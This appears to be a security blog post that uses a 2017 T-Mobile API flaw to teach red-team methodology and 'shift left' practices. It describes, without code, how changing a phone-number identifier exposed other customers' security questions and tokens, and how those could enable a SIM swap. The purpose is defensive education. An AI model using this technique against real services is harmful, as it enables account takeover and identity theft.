Almost every organization has perforations in their deployed technology.

 

Identifying and understanding where those perforations can lead to brazen vulnerabilities is essential in understanding the organization’s cybersecurity risk. The challenge that most organizations face is missing an opportunity to use multiple perspectives to inform risks across a system’s lifecycle.

 

Our goal with this month’s series of blogs is to highlight these perspectives by providing in-depth analysis of each point of view. These provide unique perspectives which inform one another to strengthen overall cyber resilience in an organization, maturing the systems we rely upon.

 

In this series, using a 2017 web application T-Mobile case study, we will examine these through:

  • A red teamer’s point of view of a production analysis on a system
  • A development-focused point of view examining the late stages of a Secure Development Lifecycle (SDLC) with emphasis on Quality Assurance
  • A holistic point of view of the design phase and application threat modeling

Through this method, we’re going to start at the end and work our way backwards to show how a real-life case study that was found in production could have been found earlier.

 

We’ll start with the red teamer’s perspective.

 

Why the Red Teamer’s POV Matters:

There is no better way to understand a system than to contract a team of experienced offensive security professionals to find the gaps and vulnerabilities that could cause great risk and harm to an organization.

 

These “red teamers” are attackers without the risk. They work alongside the blue team to provide lessons in strengthening design process, incident response capabilities, and the defensive actions a blue team needs in order to understand what the attackers are after.

 

This perspective provides the invaluable answer to the question “what happens if we were to be breached?” without going through the pain of it occurring. Further, the power of combining a red team and blue team during these simulated “attacks” allows for greater cross disciplinary culture and communication efforts.

 

Analysis — A Red Teamer’s Journey

Let’s look at a situation as if we are a red team or penetration tester contracted to assess a web application for T-Mobile. The T-Mobile security team has provided specific rules of engagement, and now our team is ready to get started.

 

Our first step when interacting with a system is to enumerate the platform and identify the attack surface. As we start interacting with the application, we want to determine which areas can be accessed and in what ways.

 

Since these can vary based on level of access, we also want to identify the roles that exist, such as an anonymous user and/or an authenticated user, as well as the transitions between them. While interacting with the application, we can record the workflows that exist and the resources they call during execution to determine where we can start our meddling.

 

While enumerating the attack surface, there will be many false starts and promising paths. Often, we’ll go down a path as soon as we identify it if it looks promising. Even more often, we’ll enumerate it and then decide on a priority based on probability of success and impact of exploitation. If we were a real attacker, we would just go for the juiciest thing we find first. However, we’re here to provide an impactful assessment of the system in scope. We want to record everything.

 

The next step is to triage these opportunities to see which is more likely to allow for some level of control.

 

Imagine we’ve now tried several viable options; we’ve analyzed existing workflows and how they are currently operating. Once we have achieved an understanding of the normal flow of the application, we begin to identify points in the workflows to perform anomalous behavior. This could be a point that allows for fault injection (we do love to throw unstructured data at inputs), but in our analysis the most promising one was discovered during normal account operations.

 

A request for the application’s profile page makes a series of network requests to different APIs that then provide the information for the application’s browser to display. Breaking down each of these requests into their components gives us a wide field within which to play.

 

Let’s point our web application proxy at this connection and let it record the requests and replies for us.

 

A meme of a man looking at a butterfly. The man is labeled “attacker” and the butterfly is labeled “API.” At the bottom of the meme, a caption reads: “Is this an attack surface?”
Only one way to find out!

 

That’s weird, the “lines” API endpoint, takes both our authentication token as well as another argument… that looks like it might be an object reference. A first instinct here is to see what happens if we lie?

 

In this screenshot, the “lines” API endpoint is illustrated. It takes both our authentication token as well as another argument.

 

In this case, the object identifier that is being sent has a very predictable format — it’s a phone number. This lets us quickly formulate alternative inputs and analyze the responses to see if we can gain further knowledge. By mutating this phone number to another valid T-Mobile phone number, we then discover that the returned information wasn’t for us, the attackers, but actually for the owner of our mutated phone number — despite still using the attacker’s access token! Quirky.

 

There are two very fun things about this attack. One, it provides us with valuable information disclosure about the user and the internal mechanism in which user IDs are built. We can take this information and use it in other API calls that take internal identifiers as arguments. Two, the returned data includes authentication mechanisms — challenge and response information — including the questions created by the user. These are then used by call centers to verify the account owner’s identity.

 

Jackpot. With this information, we will perform social engineer activities such as a SIM swap to take over the user’s phone number. And while we’re at it, we’ll use that handy “access token” field to fully compromise this user’s account.

 

A meme of a girl smugly watching a house burn down. The burning house is labeled “Your Application.”
Not the ideal scenario.

 

T-Mobile Receives Our Report. Now What?

 

There are a few ways an organization can learn about the vulnerability impacting this T-Mobile application:

  1. Cross-Discipline Communication (Red Teams talking to Blue Teams)
  2. “Shifting Left” in Early Phases of Development with QA/Exploratory Testing and Threat Modeling

 

How do these two approaches happen, and what makes them different?

 

The first is diagnostic, while the second is proactive.

 

Cross-Discipline Communication and Learning (Red Teams Talking to Blue Teams)

 

Through cross-discipline communication, an existing application is assessed by a red team in order to inform the defenders of a blue team of potential vulnerabilities that can be exploited. This allows for the blue team to collaborate with the red team to mitigate these types of attacks.

 

That exchange of expertise results in enhanced understanding of required defenses to improve the security posture of the applications and systems of the organization. In other words, the blue team and application developers learns from the red team’s mindset to be able to integrate this into their future design life cycles.

 

In this case, the root cause of the vulnerability is a mix of two classic API security problems: Excessive Data Exposure (way too much information came back in the reply to our request!) and Broken Object Level Authorization (we shouldn’t be able to see someone else’s data!).

 

The Open Web Application Security Project (OWASP) has great resources on these vulnerability classes here: the API Top 10BOLA, and EDE. By helping the developers and defenders understand the path to exploitation, and the impact of the vulnerabilities, the red team can help close not only this issue, but also prevent similar ones from making it to production in the future.

 

“Shifting Left” in Early Phases of Development with QA/Exploratory Testing and Threat Modeling

 

Now let’s examine the approach where we “shift left.” This is something we’ve discussed in greater detail in a previous blog, “Pull from the Right — because we resist the push.”

 

Learning the attacker’s point of view empowers developers to integrate this knowledge through performing QA and exploratory testing to help find vulnerabilities earlier in the process.

 

Quality Assurance team members, utilizing a practice testing method can test input and process flow for anomalous activity by several methods, including the implementation of Dynamic and Static Analysis Software Testing tools and manual or automated fuzzing. This provides the opportunity to catch bugs and vulnerabilities in code prior to release.

 

To move the emphasis even “further left” there is an opportunity for developers to begin thinking about the vulnerability even before the code is written and tested. Development teams can implement Threat Modeling, a method for assessing a system or application’s design for potential malicious capabilities.

 

While Threat Modeling is not a new concept, it has recently seen a reemergence in the community as security teams are working more closely with development teams. If the developers make choices already knowing about the possible security implications of their design and implementation, they can choose more secure options, or mitigate as they build, requiring less external mitigation and remediation by later teams.

 

In our next blog, we’ll explore in further depth the SDLC process as it relates to QA and automated testing and how “shifting left” is vital to the development process.